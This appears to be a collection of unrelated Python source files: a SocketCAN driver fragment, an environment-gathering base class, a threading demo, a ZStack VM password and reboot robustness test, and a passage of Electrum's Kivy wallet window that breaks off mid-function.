def handler_wrapper(frs: typing.Sequence[typing.Tuple[Timestamp, Envelope]]) -> None:
try:
if not self._closed: # Don't call after closure to prevent race conditions and use-after-close.
handler(frs)
except Exception as exc:
_logger.exception("%s: Unhandled exception in the receive handler: %s; lost frames: %s", self, exc, frs)
while not self._closed:
try:
(
read_ready,
_,
_,
) = select.select((self._sock, self._ctl_worker), (), (), _SELECT_TIMEOUT)
ts_mono_ns = time.monotonic_ns()
if self._sock in read_ready:
frames: typing.List[typing.Tuple[Timestamp, Envelope]] = []
try:
while True:
frames.append(self._read_frame(ts_mono_ns))
except OSError as ex:
if ex.errno != errno.EAGAIN:
raise
self._loop.call_soon_threadsafe(handler_wrapper, frames)
if self._ctl_worker in read_ready:
if self._ctl_worker.recv(1): # pragma: no branch
break
except Exception as ex: # pragma: no cover
if self._sock.fileno() < 0 or self._ctl_worker.fileno() < 0 or self._ctl_main.fileno() < 0:
self._closed = True
_logger.exception("%s thread failure: %s", self, ex)
time.sleep(1) # Is this an adequate failure management strategy?
self._closed = True
_logger.debug("%s thread is about to exit", self)
def _read_frame(self, ts_mono_ns: int) -> typing.Tuple[Timestamp, Envelope]:
while True:
data, ancdata, msg_flags, _addr = self._sock.recvmsg(
self._native_frame_size, self._ancillary_data_buffer_size
)
assert msg_flags & socket.MSG_TRUNC == 0, "The data buffer is not large enough"
assert msg_flags & socket.MSG_CTRUNC == 0, "The ancillary data buffer is not large enough"
loopback = bool(msg_flags & socket.MSG_CONFIRM)
ts_system_ns = 0
for cmsg_level, cmsg_type, cmsg_data in ancdata:
if cmsg_level == socket.SOL_SOCKET and cmsg_type == _SO_TIMESTAMP:
sec, usec = _TIMEVAL_STRUCT.unpack(cmsg_data)
ts_system_ns = (sec * 1_000_000 + usec) * 1000
else:
assert False, f"Unexpected ancillary data: {cmsg_level}, {cmsg_type}, {cmsg_data!r}"
assert ts_system_ns > 0, "Missing the timestamp; does the driver support timestamping?"
timestamp = Timestamp(system_ns=ts_system_ns, monotonic_ns=ts_mono_ns)
out = SocketCANMedia._parse_native_frame(data)
if out is not None:
return timestamp, Envelope(out, loopback=loopback)
def _compile_native_frame(self, source: DataFrame) -> bytes:
flags = _CANFD_BRS if self._is_fd else 0
ident = source.identifier | (_CAN_EFF_FLAG if source.format == FrameFormat.EXTENDED else 0)
header = _FRAME_HEADER_STRUCT.pack(ident, len(source.data), flags)
out = header + source.data.ljust(self._native_frame_data_capacity, b"\x00")
assert len(out) == self._native_frame_size
return out
@staticmethod
def _parse_native_frame(source: bytes) -> typing.Optional[DataFrame]:
header_size = _FRAME_HEADER_STRUCT.size
ident_raw, data_length, _flags = _FRAME_HEADER_STRUCT.unpack(source[:header_size])
if (ident_raw & _CAN_RTR_FLAG) or (ident_raw & _CAN_ERR_FLAG): # Unsupported format, ignore silently
_logger.debug("Unsupported CAN frame dropped; raw SocketCAN ID is %08x", ident_raw)
return None
frame_format = FrameFormat.EXTENDED if ident_raw & _CAN_EFF_FLAG else FrameFormat.BASE
data = source[header_size : header_size + data_length]
assert len(data) == data_length
ident = ident_raw & _CAN_EFF_MASK
return DataFrame(frame_format, ident, bytearray(data))
def _set_loopback_enabled(self, enable: bool) -> None:
if enable != self._loopback_enabled:
self._sock.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_RECV_OWN_MSGS, int(enable)) # type: ignore
self._loopback_enabled = enable
@staticmethod
def list_available_interface_names() -> typing.Iterable[str]:
import re
import subprocess
try:
proc = subprocess.run("ip link show", check=True, timeout=1, text=True, shell=True, capture_output=True)
return re.findall(r"\d+?: ([a-z0-9]+?): <[^>]*UP[^>]*>.*\n *link/can", proc.stdout)
except Exception as ex:
_logger.debug(
"Could not scrape the output of `ip link show`, using the fallback method: %s", ex, exc_info=True
)
with open("/proc/net/dev") as f:
out = [line.split(":")[0].strip() for line in f if ":" in line and "can" in line]
return sorted(out, key=lambda x: "can" in x, reverse=True)
class _NativeFrameDataCapacity(enum.IntEnum):
CAN_CLASSIC = 8
CAN_FD = 64
_SELECT_TIMEOUT = 1.0
# struct can_frame {
# canid_t can_id; /* 32 bit CAN_ID + EFF/RTR/ERR flags */
# __u8 can_dlc; /* data length code: 0 .. 8 */
# __u8 data[8] __attribute__((aligned(8)));
# };
# struct canfd_frame {
# canid_t can_id; /* 32 bit CAN_ID + EFF/RTR/ERR flags */
# __u8 len; /* frame payload length in byte */
# __u8 flags; /* additional flags for CAN FD */
# __u8 __res0; /* reserved / padding */
# __u8 __res1; /* reserved / padding */
# __u8 data[CANFD_MAX_DLEN] __attribute__((aligned(8)));
# };
_FRAME_HEADER_STRUCT = struct.Struct("=IBB2x") # Using standard size because the native definition relies on stdint.h
_TIMEVAL_STRUCT = struct.Struct("@Ll") # Using native size because the native definition uses plain integers
# From the Linux kernel; not exposed via the Python's socket module
_SO_TIMESTAMP = 29
_CANFD_BRS = 1
_CAN_EFF_FLAG = 0x80000000
_CAN_RTR_FLAG = 0x40000000
_CAN_ERR_FLAG = 0x20000000
_CAN_EFF_MASK = 0x1FFFFFFF
def _make_socket(iface_name: str, can_fd: bool) -> socket.SocketType:
s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) # type: ignore
try:
s.bind((iface_name,))
s.setsockopt(socket.SOL_SOCKET, _SO_TIMESTAMP, 1) # timestamping
if can_fd:
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FD_FRAMES, 1) # type: ignore
s.setblocking(False)
if 0 != s.getsockopt(socket.SOL_SOCKET, socket.SO_ERROR):
raise OSError("Could not configure the socket: getsockopt(SOL_SOCKET, SO_ERROR) != 0")
except BaseException:
with contextlib.suppress(Exception):
s.close()
raise
return s
|
abstract_gatherer.py
|
'''
File: abstract_gatherer.py
Project: Envirosave: A simple attempt at saving a lot of
information about the execution environment at a given point
Author: csm10495
Copyright: MIT License - 2018
'''
import datetime
import os
import pprint
import threading
import time
import subprocess
GATHERER_MAGIC = 'Gatherer Magic!' # set on all gatherers to know they are gatherers
from six import iteritems, string_types
class AbstractGatherer(object):
'''
abstract class for all gatherers to extend from
'''
MAGIC = GATHERER_MAGIC
def __init__(self):
'''
initializer. Also sets up the itemDict and a lock on it for async access
'''
self.itemDict = {}
self.threads = []
self.itemDictLock = threading.Lock()
def __getstate__(self):
'''
used for pickling
'''
d = self.__dict__
d['itemDictLock'] = None
return d
def __setstate__(self, d):
'''
used for pickling
'''
self.__dict__ = d
self.itemDictLock = threading.Lock()
def __getattribute__(self, name):
'''
this is used as a hack to ensure we get a start/end time for all gatherers
it also will force a wait until all threads are complete before returning
from the call to gather()
'''
if name == 'gather':
def gatherWrapper(*args, **kwargs):
self.itemDict['StartTime'] = datetime.datetime.now()
if object.__getattribute__(self, name)(*args, **kwargs):
self._waitTillGatheringIsComplete()
self.itemDict['EndTime'] = datetime.datetime.now()
return True
return False
return gatherWrapper
return object.__getattribute__(self, name)
def parse(self, outFile=None):
'''
utility function to parse the data to screen or file
'''
s = str(self)
if outFile:
with open(outFile, 'a+') as f:
f.write(s)
else:
print (s)
def parseToFolder(self, outDir):
'''
utility to turn itemDict into a folder of files per entry
'''
try:
os.makedirs(outDir)
except:
pass
for key, value in iteritems(self.itemDict):
outFile = os.path.join(outDir, key.replace("/", "_").replace("\\", "_").replace(":", '_').replace("\"", "_").replace("*", "_"))
if hasattr(value, 'toEnvirosaveBinary'):
# Maybe we should save binary instead of text?
value.toEnvirosaveBinary(outFile)
else:
with open(outFile, 'w') as f:
if isinstance(value, string_types):
f.write(value)
else:
f.write(pprint.pformat(value, width=200))
def __str__(self):
'''
returns a string representation of the gatherer (via its itemDict)
'''
retStr = ''
for key, value in self.itemDict.items():
retStr += '%-20s : \n %s\n' % (key, str(value).replace('\n', '\n ').rstrip(' '))
return retStr
def addShellOutput(self, cmd):
'''
Will call a thread to do the shell call
'''
t = threading.Thread(target=self._addShellOutput, args=(cmd,))
t.start()
self.threads.append(t)
def _addShellOutput(self, cmd):
'''
Calls the cmd in a subprocess to put the output in the itemDict
'''
try:
tmp = subprocess.check_output(cmd, shell=True, stderr=subprocess.STDOUT, universal_newlines=True)
except subprocess.CalledProcessError:
return # fail?
with self.itemDictLock:
self.itemDict[cmd] = tmp
def addFunctionOutput(self, func, args=None, nameOverride=None, hideException=False):
'''
runs a function in a thread and saves the return data in the itemDict
'''
t = threading.Thread(target=self._addFunctionOutput, args=(func, args, nameOverride, hideException))
t.start()
self.threads.append(t)
def _addFunctionOutput(self, func, args=None, nameOverride=None, hideException=False):
'''
called by addFunctionOutput() in a thread
'''
if args is None:
args = []
name = nameOverride or func.__name__
try:
result = func(*args)
except:
if not hideException:
raise
else:
return
with self.itemDictLock:
self.itemDict[name] = result
def _waitTillGatheringIsComplete(self, timeout=10):
'''
Called to complete gathering
'''
deathTime = time.time() + timeout
while time.time() < deathTime:
numAlive = 0
for i in self.threads:
i.join(.0001)
if i.isAlive():
numAlive += 1
if numAlive == 0:
self.threads = []
break
time.sleep(.0001)
else:
raise RuntimeError("Timeout waiting for gathering to complete!")
@classmethod
def isValid(cls):
'''
return True if this gatherer can be run right now
otherwise return False
'''
raise NotImplementedError
def gather(self):
'''
return True if it worked and itemDict is being updated,
otherwise return False
'''
raise NotImplementedError
|
Thread4.py
|
from threading import Thread
import time
""" 列表作为参数传递给线程,它和全局变量一样也是线程间共享的 """
def work1(nums):
nums.append(44)
print('---in work1---', nums)
def work2(nums):
time.sleep(1)
print('---in work2---', nums)
g_nums = [11, 22, 33]
t1 = Thread(target=work1, args=(g_nums,))
t1.start()
t2 = Thread(target=work2, args=(g_nums,))
t2.start()
|
test_ga_robust_on_c7.py
|
'''
test for batch changing vm password
@author: SyZhao
'''
import apibinding.inventory as inventory
import zstackwoodpecker.test_util as test_util
import zstackwoodpecker.test_lib as test_lib
import zstackwoodpecker.test_state as test_state
import zstackwoodpecker.operations.vm_operations as vm_ops
import zstacklib.utils.ssh as ssh
import threading
import test_stub
vm_num = 3
max_cnt = 100
keep_vm_num = 8
ga_process_not_alive_num = 0
vms = []
ts = []
invs = []
def check_qemu_ga_is_alive(vm):
global ga_process_not_alive_num
vm.check()
cmd = "ps -aux|grep ga|grep qemu"
ret, output, stderr = ssh.execute(cmd, vm.get_vm().vmNics[0].ip, "root", "password", False, 22)
if ret != 0:
test_util.test_logger("qemu-ga is not alived when exception triggered: ip:%s; cmd:%s; user:%s; password:%s; stdout:%s, stderr:%s" %(vm.get_vm().vmNics[0].ip, cmd, "root", "password", output, stderr))
ga_process_not_alive_num = ga_process_not_alive_num + 1
return ret
def change_vm_password_wrapper(vm_uuid, usr, passwd, skip_stopped_vm = None, session_uuid = None):
global invs
inv = vm_ops.change_vm_password(vm_uuid, usr, passwd, skip_stopped_vm, session_uuid)
if inv:
invs.append(inv)
def vm_reboot_wrapper(vm, cnt):
global keep_vm_num
test_util.test_logger("loop cnt:%d" %(int(cnt)))
if vm:
try:
vm.check()
vm.stop()
vm.check()
vm.start()
vm.check()
except:
keep_vm_num = keep_vm_num-1
vms.remove(vm)
vms.append(test_stub.create_vm(vm_name = 'c7-vm-new-'+str(keep_vm_num), image_name = "batch_test_image"))
if keep_vm_num < 0:
vm.destroy()
vm.expunge()
else:
test_util.test_logger("vm is null")
def test():
global vms, ts, invs
global ga_process_not_alive_num,keep_vm_num
test_util.test_dsc('create VM with setting password')
for i in range(vm_num):
vms.append(test_stub.create_vm(vm_name = 'c7-vm'+str(i), image_name = "batch_test_image"))
for vm in vms:
t = threading.Thread(target=change_vm_password_wrapper, args=(vm.get_vm().uuid, "root", "password"))
ts.append(t)
t.start()
for t in ts:
t.join()
for cnt in range(max_cnt):
test_util.test_dsc("this is loop:%d" %(cnt))
for vm in vms:
t = threading.Thread(target=vm_reboot_wrapper, args=(vm, cnt))
ts.append(t)
t.start()
for t in ts:
t.join()
for vm in vms:
if check_qemu_ga_is_alive(vm) != 0:
keep_vm_num = keep_vm_num-1
vms.remove(vm)
vms.append(test_stub.create_vm(vm_name = 'c7-vm-new-'+str(keep_vm_num), image_name = "batch_test_image"))
if keep_vm_num < 0:
vm.destroy()
vm.expunge()
for vm in vms:
if vm:
vm.destroy()
vm.expunge()
test_util.test_fail('total vm reboot times:%s; ga not existed vm:%s' %(vm_num*max_cnt, ga_process_not_alive_num))
#Will be called only if exception happens in test().
def error_cleanup():
global vms
pass
#for vm in vms:
# if vm:
# vm.destroy()
# vm.expunge()
|
main_window.py
|
import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
from electrum.bitcoin import TYPE_ADDRESS
from electrum.storage import WalletStorage
from electrum.wallet import Wallet
from electrum.i18n import _
from electrum.paymentrequest import InvoiceStore
from electrum.util import profiler, InvalidPassword
from electrum.plugin import run_hook
from electrum.util import format_satoshis, format_satoshis_plain
from electrum.paymentrequest import PR_UNPAID, PR_PAID, PR_UNKNOWN, PR_EXPIRED
from kivy.app import App
from kivy.core.window import Window
from kivy.logger import Logger
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
## lazy imports for factory so that widgets can be used in kv
#Factory.register('InstallWizard', module='electrum.gui.kivy.uix.dialogs.installwizard')
#Factory.register('InfoBubble', module='electrum.gui.kivy.uix.dialogs')
#Factory.register('OutputList', module='electrum.gui.kivy.uix.dialogs')
#Factory.register('OutputItem', module='electrum.gui.kivy.uix.dialogs')
from .uix.dialogs.installwizard import InstallWizard
from .uix.dialogs import InfoBubble, crash_reporter
from .uix.dialogs import OutputList, OutputItem
from .uix.dialogs import TopLabel, RefLabel
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
notification = app = ref = None
util = False
# register widget cache for keeping memory down timeout to forever to cache
# the data
Cache.register('electrum_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
Factory.register('TabbedCarousel', module='electrum.gui.kivy.uix.screens')
# Register fonts without this you won't be able to use bold/italic...
# inside markup.
from kivy.core.text import Label
Label.register('Roboto',
'electrum/gui/kivy/data/fonts/Roboto.ttf',
'electrum/gui/kivy/data/fonts/Roboto.ttf',
'electrum/gui/kivy/data/fonts/Roboto-Bold.ttf',
'electrum/gui/kivy/data/fonts/Roboto-Bold.ttf')
from electrum.util import (base_units, NoDynamicFeeEstimates, decimal_point_to_base_unit_name,
base_unit_name_to_decimal_point, NotEnoughFunds)
class ElectrumWindow(App):
electrum_config = ObjectProperty(None)
language = StringProperty('en')
# properties might be updated by the network
num_blocks = NumericProperty(0)
num_nodes = NumericProperty(0)
server_host = StringProperty('')
server_port = StringProperty('')
num_chains = NumericProperty(0)
blockchain_name = StringProperty('')
fee_status = StringProperty('Fee')
balance = StringProperty('')
fiat_balance = StringProperty('')
is_fiat = BooleanProperty(False)
blockchain_checkpoint = NumericProperty(0)
auto_connect = BooleanProperty(False)
def on_auto_connect(self, instance, x):
host, port, protocol, proxy, auto_connect = self.network.get_parameters()
self.network.set_parameters(host, port, protocol, proxy, self.auto_connect)
def toggle_auto_connect(self, x):
self.auto_connect = not self.auto_connect
def choose_server_dialog(self, popup):
from .uix.dialogs.choice_dialog import ChoiceDialog
protocol = 's'
def cb2(host):
from electrum import constants
pp = servers.get(host, constants.net.DEFAULT_PORTS)
port = pp.get(protocol, '')
popup.ids.host.text = host
popup.ids.port.text = port
servers = self.network.get_servers()
ChoiceDialog(_('Choose a server'), sorted(servers), popup.ids.host.text, cb2).open()
def choose_blockchain_dialog(self, dt):
from .uix.dialogs.choice_dialog import ChoiceDialog
chains = self.network.get_blockchains()
def cb(name):
for index, b in self.network.blockchains.items():
if name == b.get_name():
self.network.follow_chain(index)
names = [self.network.blockchains[b].get_name() for b in chains]
if len(names) > 1:
cur_chain = self.network.blockchain().get_name()
ChoiceDialog(_('Choose your chain'), names, cur_chain, cb).open()
use_rbf = BooleanProperty(False)
def on_use_rbf(self, instance, x):
self.electrum_config.set_key('use_rbf', self.use_rbf, True)
use_change = BooleanProperty(False)
def on_use_change(self, instance, x):
self.electrum_config.set_key('use_change', self.use_change, True)
use_unconfirmed = BooleanProperty(False)
def on_use_unconfirmed(self, instance, x):
self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True)
def set_URI(self, uri):
self.switch_to('send')
self.send_screen.set_URI(uri)
def on_new_intent(self, intent):
if intent.getScheme() != 'bitcoin':
return
uri = intent.getDataString()
self.set_URI(uri)
def on_language(self, instance, language):
Logger.info('language: {}'.format(language))
_.switch_lang(language)
def update_history(self, *dt):
if self.history_screen:
self.history_screen.update()
def on_quotes(self, d):
Logger.info("on_quotes")
self._trigger_update_history()
def on_history(self, d):
Logger.info("on_history")
self._trigger_update_history()
def _get_bu(self):
decimal_point = self.electrum_config.get('decimal_point', 5)
return decimal_point_to_base_unit_name(decimal_point)
def _set_bu(self, value):
assert value in base_units.keys()
decimal_point = base_unit_name_to_decimal_point(value)
self.electrum_config.set_key('decimal_point', decimal_point, True)
self._trigger_update_status()
self._trigger_update_history()
base_unit = AliasProperty(_get_bu, _set_bu)
status = StringProperty('')
fiat_unit = StringProperty('')
def on_fiat_unit(self, a, b):
self._trigger_update_history()
def decimal_point(self):
return base_units[self.base_unit]
def btc_to_fiat(self, amount_str):
if not amount_str:
return ''
if not self.fx.is_enabled():
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / pow(10, 8)
return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')
def fiat_to_btc(self, fiat_amount):
if not fiat_amount:
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
satoshis = int(pow(10,8) * Decimal(fiat_amount) / Decimal(rate))
return format_satoshis_plain(satoshis, self.decimal_point())
def get_amount(self, amount_str):
a, u = amount_str.split()
assert u == self.base_unit
try:
x = Decimal(a)
except:
return None
p = pow(10, self.decimal_point())
return int(p * x)
_orientation = OptionProperty('landscape',
options=('landscape', 'portrait'))
def _get_orientation(self):
return self._orientation
orientation = AliasProperty(_get_orientation,
None,
bind=('_orientation',))
'''Tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`orientation` is a read only `AliasProperty` Defaults to 'landscape'
'''
_ui_mode = OptionProperty('phone', options=('tablet', 'phone'))
def _get_ui_mode(self):
return self._ui_mode
ui_mode = AliasProperty(_get_ui_mode,
None,
bind=('_ui_mode',))
'''Defines tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`ui_mode` is a read only `AliasProperty` Defaults to 'phone'
'''
def __init__(self, **kwargs):
# initialize variables
self._clipboard = Clipboard
self.info_bubble = None
self.nfcscanner = None
self.tabs = None
self.is_exit = False
self.wallet = None
self.pause_time = 0
App.__init__(self)#, **kwargs)
title = _('Electrum App')
self.electrum_config = config = kwargs.get('config', None)
self.language = config.get('language', 'en')
self.network = network = kwargs.get('network', None)
if self.network:
self.num_blocks = self.network.get_local_height()
self.num_nodes = len(self.network.get_interfaces())
host, port, protocol, proxy_config, auto_connect = self.network.get_parameters()
self.server_host = host
self.server_port = port
self.auto_connect = auto_connect
self.proxy_config = proxy_config if proxy_config else {}
self.plugins = kwargs.get('plugins', [])
self.gui_object = kwargs.get('gui_object', None)
self.daemon = self.gui_object.daemon
self.fx = self.daemon.fx
self.use_rbf = config.get('use_rbf', True)
self.use_change = config.get('use_change', True)
self.use_unconfirmed = not config.get('confirmed_only', False)
# create triggers so as to minimize updating a max of 2 times a sec
self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
# cached dialogs
self._settings_dialog = None
self._password_dialog = None
self.fee_status = self.electrum_config.get_fee_status()
def wallet_name(self):
return os.path.basename(self.wallet.storage.path) if self.wallet else ' '
def on_pr(self, pr):
if not self.wallet:
self.show_error(_('No wallet loaded.'))
return
if pr.verify(self.wallet.contacts):
key = self.wallet.invoices.add(pr)
if self.invoices_screen:
self.invoices_screen.update()
status = self.wallet.invoices.get_status(key)
if status == PR_PAID:
self.show_error("invoice already paid")
self.send_screen.do_clear()
else:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
else:
self.switch_to('send')
self.send_screen.set_request(pr)
else:
self.show_error("invoice error:" + pr.error)
self.send_screen.do_clear()
def on_qr(self, data):
from electrum.bitcoin import base_decode, is_address
data = data.strip()
if is_address(data):
self.set_URI(data)
return
if data.startswith('bitcoin:'):
self.set_URI(data)
return
# try to decode transaction
from electrum.transaction import Transaction
from electrum.util import bh2u
try:
text = bh2u(base_decode(data, None, base=43))
tx = Transaction(text)
tx.deserialize()
except:
tx = None
if tx:
self.tx_dialog(tx)
return
# show error
self.show_error("Unable to decode QR data")
def update_tab(self, name):
s = getattr(self, name + '_screen', None)
if s:
s.update()
@profiler
def update_tabs(self):
for tab in ['invoices', 'send', 'history', 'receive', 'address']:
self.update_tab(tab)
def switch_to(self, name):
s = getattr(self, name + '_screen', None)
if s is None:
s = self.tabs.ids[name + '_screen']
s.load_screen()
panel = self.tabs.ids.panel
tab = self.tabs.ids[name + '_tab']
panel.switch_to(tab)
def show_request(self, addr):
self.switch_to('receive')
self.receive_screen.screen.address = addr
def show_pr_details(self, req, status, is_invoice):
from electrum.util import format_time
requestor = req.get('requestor')
exp = req.get('exp')
memo = req.get('memo')
amount = req.get('amount')
fund = req.get('fund')
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/invoice.kv')
popup.is_invoice = is_invoice
popup.amount = amount
popup.requestor = requestor if is_invoice else req.get('address')
popup.exp = format_time(exp) if exp else ''
popup.description = memo if memo else ''
popup.signature = req.get('signature', '')
popup.status = status
popup.fund = fund if fund else 0
txid = req.get('txid')
popup.tx_hash = txid or ''
popup.on_open = lambda: popup.ids.output_list.update(req.get('outputs', []))
popup.export = self.export_private_keys
popup.open()
def show_addr_details(self, req, status):
from electrum.util import format_time
fund = req.get('fund')
isaddr = 'y'
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/invoice.kv')
popup.isaddr = isaddr
popup.is_invoice = False
popup.status = status
popup.requestor = req.get('address')
popup.fund = fund if fund else 0
popup.export = self.export_private_keys
popup.open()
def qr_dialog(self, title, data, show_text=False):
from .uix.dialogs.qr_dialog import QRDialog
popup = QRDialog(title, data, show_text)
popup.open()
def scan_qr(self, on_complete):
if platform != 'android':
return
from jnius import autoclass, cast
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
SimpleScannerActivity = autoclass("org.electrum.qr.SimpleScannerActivity")
Intent = autoclass('android.content.Intent')
intent = Intent(PythonActivity.mActivity, SimpleScannerActivity)
def on_qr_result(requestCode, resultCode, intent):
try:
if resultCode == -1: # RESULT_OK:
# this doesn't work due to some bug in jnius:
# contents = intent.getStringExtra("text")
String = autoclass("java.lang.String")
contents = intent.getStringExtra(String("text"))
on_complete(contents)
finally:
activity.unbind(on_activity_result=on_qr_result)
activity.bind(on_activity_result=on_qr_result)
PythonActivity.mActivity.startActivityForResult(intent, 0)
def do_share(self, data, title):
if platform != 'android':
return
from jnius import autoclass, cast
JS = autoclass('java.lang.String')
Intent = autoclass('android.content.Intent')
sendIntent = Intent()
sendIntent.setAction(Intent.ACTION_SEND)
sendIntent.setType("text/plain")
sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
PythonActivity = autoclass('org.kivy.android.PythonActivity')
currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
currentActivity.startActivity(it)
def build(self):
return Builder.load_file('electrum/gui/kivy/main.kv')
def _pause(self):
if platform == 'android':
# move activity to back
from jnius import autoclass
python_act = autoclass('org.kivy.android.PythonActivity')
mActivity = python_act.mActivity
mActivity.moveTaskToBack(True)
def on_start(self):
''' This is the start point of the kivy ui
'''
import time
Logger.info('Time to on_start: {} <<<<<<<<'.format(time.clock()))
win = Window
win.bind(size=self.on_size, on_keyboard=self.on_keyboard)
win.bind(on_key_down=self.on_key_down)
#win.softinput_mode = 'below_target'
self.on_size(win, win.size)
self.init_ui()
crash_reporter.ExceptionHook(self)
# init plugins
run_hook('init_kivy', self)
# fiat currency
self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
# default tab
self.switch_to('history')
# bind intent for bitcoin: URI scheme
if platform == 'android':
from android import activity
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
mactivity = PythonActivity.mActivity
self.on_new_intent(mactivity.getIntent())
activity.bind(on_new_intent=self.on_new_intent)
# connect callbacks
if self.network:
interests = ['updated', 'status', 'new_transaction', 'verified', 'interfaces']
self.network.register_callback(self.on_network_event, interests)
self.network.register_callback(self.on_fee, ['fee'])
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
# load wallet
self.load_wallet_by_name(self.electrum_config.get_wallet_path())
# URI passed in config
uri = self.electrum_config.get('url')
if uri:
self.set_URI(uri)
def get_wallet_path(self):
if self.wallet:
return self.wallet.storage.path
else:
return ''
def on_wizard_complete(self, wizard, wallet):
if wallet: # wizard returned a wallet
wallet.start_threads(self.daemon.network)
self.daemon.add_wallet(wallet)
self.load_wallet(wallet)
elif not self.wallet:
# wizard did not return a wallet; and there is no wallet open atm
# try to open last saved wallet (potentially start wizard again)
self.load_wallet_by_name(self.electrum_config.get_wallet_path(), ask_if_wizard=True)
def load_wallet_by_name(self, path, ask_if_wizard=False):
if not path:
return
if self.wallet and self.wallet.storage.path == path:
return
wallet = self.daemon.load_wallet(path, None)
if wallet:
if wallet.has_password():
self.password_dialog(wallet, _('Enter PIN code'), lambda x: self.load_wallet(wallet), self.stop)
else:
self.load_wallet(wallet)
else:
Logger.debug('Electrum: Wallet not found or action needed. Launching install wizard')
def launch_wizard():
storage = WalletStorage(path, manual_upgrades=True)
wizard = Factory.InstallWizard(self.electrum_config, self.plugins, storage)
wizard.bind(on_wizard_complete=self.on_wizard_complete)
action = wizard.storage.get_action()
wizard.run(action)
if not ask_if_wizard:
launch_wizard()
else:
from .uix.dialogs.question import Question
def handle_answer(b: bool):
if b:
launch_wizard()
else:
try: os.unlink(path)
except FileNotFoundError: pass
self.stop()
d = Question(_('Do you want to launch the wizard again?'), handle_answer)
d.open()
def on_stop(self):
Logger.info('on_stop')
if self.wallet:
self.electrum_config.save_last_wallet(self.wallet)
self.stop_wallet()
def stop_wallet(self):
if self.wallet:
self.daemon.stop_wallet(self.wallet.storage.path)
self.wallet = None
def on_key_down(self, instance, key, keycode, codepoint, modifiers):
if 'ctrl' in modifiers:
# q=24 w=25
if keycode in (24, 25):
self.stop()
elif keycode == 27:
# r=27
# force update wallet
self.update_wallet()
elif keycode == 112:
# pageup
#TODO move to next tab
pass
elif keycode == 117:
# pagedown
#TODO move to prev tab
pass
#TODO: alt+tab_number to activate the particular tab
def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
if key == 27 and self.is_exit is False:
self.is_exit = True
self.show_info(_('Press again to exit'))
return True
# override settings button
if key in (319, 282): #f1/settings button on android
#self.gui.main_gui.toggle_settings(self)
return True
def settings_dialog(self):
from .uix.dialogs.settings import SettingsDialog
if self._settings_dialog is None:
self._settings_dialog = SettingsDialog(self)
self._settings_dialog.update()
self._settings_dialog.open()
def popup_dialog(self, name):
if name == 'settings':
self.settings_dialog()
elif name == 'wallets':
from .uix.dialogs.wallets import WalletDialog
d = WalletDialog()
d.open()
elif name == 'status':
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/'+name+'.kv')
master_public_keys_layout = popup.ids.master_public_keys
for xpub in self.wallet.get_master_public_keys()[1:]:
master_public_keys_layout.add_widget(TopLabel(text=_('Master Public Key')))
ref = RefLabel()
ref.name = _('Master Public Key')
ref.data = xpub
master_public_keys_layout.add_widget(ref)
popup.open()
else:
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/'+name+'.kv')
popup.open()
@profiler
def init_ui(self):
''' Initialize The Ux part of electrum. This function performs the basic
tasks of setting up the ui.
'''
#from weakref import ref
self.funds_error = False
# setup UX
self.screens = {}
#setup lazy imports for mainscreen
Factory.register('AnimatedPopup',
module='electrum.gui.kivy.uix.dialogs')
Factory.register('QRCodeWidget',
module='electrum.gui.kivy.uix.qrcodewidget')
# preload widgets. Remove this if you want to load the widgets on demand
#Cache.append('electrum_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
#Cache.append('electrum_widgets', 'QRCodeWidget', Factory.QRCodeWidget())
# load and focus the ui
self.root.manager = self.root.ids['manager']
self.history_screen = None
self.contacts_screen = None
self.send_screen = None
self.invoices_screen = None
self.receive_screen = None
self.requests_screen = None
self.address_screen = None
self.icon = "icons/electrum.png"
self.tabs = self.root.ids['tabs']
def update_interfaces(self, dt):
self.num_nodes = len(self.network.get_interfaces())
self.num_chains = len(self.network.get_blockchains())
chain = self.network.blockchain()
self.blockchain_checkpoint = chain.get_checkpoint()
self.blockchain_name = chain.get_name()
interface = self.network.interface
if interface:
self.server_host = interface.host
def on_network_event(self, event, *args):
Logger.info('network event: '+ event)
if event == 'interfaces':
self._trigger_update_interfaces()
elif event == 'updated':
self._trigger_update_wallet()
self._trigger_update_status()
elif event == 'status':
self._trigger_update_status()
elif event == 'new_transaction':
self._trigger_update_wallet()
elif event == 'verified':
self._trigger_update_wallet()
@profiler
def load_wallet(self, wallet):
if self.wallet:
self.stop_wallet()
